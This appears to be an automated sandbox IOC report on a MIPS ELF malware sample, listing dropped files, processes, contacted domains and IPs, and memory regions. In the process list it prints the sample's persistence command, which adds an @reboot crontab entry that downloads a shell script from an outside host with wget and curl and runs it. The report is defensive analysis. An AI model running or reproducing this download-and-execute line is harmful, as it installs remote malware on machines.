IOC Report
mips.elf

loading gif

Files

File Path
Type
Category
Malicious
mips.elf
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
malicious
/var/spool/cron/crontabs/tmp.fI62Ih
ASCII text
dropped
malicious

Processes

Path
Cmdline
Malicious
/tmp/mips.elf
/tmp/mips.elf
/tmp/mips.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/mips.elf
-
/tmp/mips.elf
-
/tmp/mips.elf
-
/tmp/mips.elf
-
/tmp/mips.elf
-
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Domains

Name
IP
Malicious
kingstonwikkerink.dyn
81.29.149.178

IPs

IP
Domain
Country
Malicious
195.133.92.51
unknown
Russian Federation
malicious
185.82.200.181
unknown
Netherlands
213.182.204.57
unknown
Latvia
194.87.198.29
unknown
Russian Federation
193.233.193.45
unknown
Russian Federation
109.202.202.202
unknown
Switzerland
86.107.100.80
unknown
Romania
88.151.195.22
unknown
Azerbaijan
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
5562c53dc000
page execute and read and write
7f4b54021000
page read and write
7f4b597e0000
page read and write
7ffc99f5d000
page read and write
5562c53f3000
page read and write
7f4b5982d000
page read and write
7f4b596b7000
page read and write
7ffc99f68000
page execute read
5562c314c000
page execute read
7f4b597e8000
page read and write
7f4ad445f000
page read and write
5562c33de000
page read and write
7f4b54000000
page read and write
7f4b58b14000
page read and write
7ffc99f68000
page execute read
7f4b582fe000
page read and write
5562c5ecc000
page read and write
7f4ad4418000
page execute read
5562c53dc000
page execute and read and write
7f4b596b7000
page read and write
5562c33de000
page read and write
5562c53f3000
page read and write
7f4b59188000
page read and write
7f4ad4418000
page execute read
7f4b591a5000
page read and write
5562c5ecc000
page read and write
7f4b597e8000
page read and write
7f4ad4459000
page read and write
7f4b54021000
page read and write
7f4b58b14000
page read and write
7f4b54000000
page read and write
7f4b582fe000
page read and write
7f4b594d6000
page read and write
5562c33d4000
page read and write
7f4b597e0000
page read and write
7f4b59165000
page read and write
7f4b594d6000
page read and write
7f4b58dc4000
page read and write
7f4b5982d000
page read and write
5562c314c000
page execute read
7f4ad4459000
page read and write
7f4b58b06000
page read and write
7f4b59165000
page read and write
7f4b59188000
page read and write
7f4b58b06000
page read and write
7ffc99f5d000
page read and write
7f4b58dc4000
page read and write
7f4b591a5000
page read and write
5562c33d4000
page read and write
7f4ad445f000
page read and write
There are 40 hidden memdumps, click here to show them.